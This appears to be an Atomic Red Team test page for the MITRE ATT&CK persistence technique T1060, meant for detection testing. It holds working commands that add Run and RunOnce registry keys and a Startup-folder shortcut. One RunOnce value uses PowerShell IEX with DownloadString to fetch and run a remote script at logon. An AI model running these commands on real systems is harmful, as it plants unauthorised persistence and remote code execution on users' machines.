Michael Haag
aee2840fd5
+ Office Application Startup -- Added DDEAUTO and Dragon's Tail link + Registry Run Keys and Start Folder -- Added a couple of items to make this interesting. +Updated Windows Readme
1.5 KiB
1.5 KiB
Registry Run Keys / Start Folder
MITRE ATT&CK Technique: T1060
Reg Add
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\Path\AtomicRedTeam.exe"
PowerShell
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" 'C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
Oneliner:
set-itemproperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" "NextRun" 'C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
Startup Folder
Single User:
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
All Users:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
Add .lnk file to startup with PowerShell:
$TargetFile = "$env:SystemRoot\System32\notepad.exe"
$ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()